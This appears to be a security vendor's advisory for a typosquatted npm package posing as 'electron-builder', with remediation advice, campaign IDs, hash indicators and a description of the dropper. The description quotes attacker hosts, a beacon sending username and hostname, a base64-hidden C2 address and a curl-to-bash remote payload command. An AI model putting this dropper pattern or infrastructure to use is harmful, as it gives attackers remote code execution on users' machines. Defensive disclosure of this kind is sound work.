Which versions of @403name/electron-buidler are malicious?

The following npm versions of @403name/electron-buidler are flagged malicious: 1.0.0, 1.0.1. Treat any of these as compromised.

How do I remediate @403name/electron-buidler if I installed it?

Remove @403name/electron-buidler from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is @403name/electron-buidler part of a known attack campaign?

Yes — @403name/electron-buidler is associated with the IN-MAL-2026-005449, IN-MAL-2026-005452 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect @403name/electron-buidler in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking @403name/electron-buidler and packages like it before any post-install script runs.

Malicious package

@403name/electron-buidlernpm

Malicious code in @403name/electron-buidler (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5547

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @403name/electron-buidler

What this malware does

On require(), index.js executes an immediately-invoked function that platform-gates to macOS, skips CI environments, drops a one-shot marker file in ~/.cache/.nyx-npm/eb, then after a 30-90 second random delay performs two attacker-controlled network operations. First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname(), and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim to the attacker. Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn a C2 base (base64-encoded fallback decodes to https://k7xm9q.xyz), then pipes curl -sSfL <C2>/api/payload/ | /bin/bash via spawn('/bin/sh','-c',...) with & disown to detach the shell. The C2 host is concealed via atob('aHR0cHM6Ly9rN3htOXEueHl6'). The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package under an unrelated scope; the README's 'Electron application builder' claim is a cover for the dropper. Importing this package on a non-CI macOS host yields full remote code execution as the installing user with attacker-controlled payload delivery and no consent.

Malicious versions

2 flagged

1.0.01.0.1

Indicators of compromise (SHA-256)

6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4

bf81a596bee9d4858a18bd26f5037bfdab52f11400c3590dc8b99b6e3e1daa53

Frequently asked questions

No. @403name/electron-buidler on npm has been identified as a malicious package (versions 1.0.0, 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005449IN-MAL-2026-005452

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection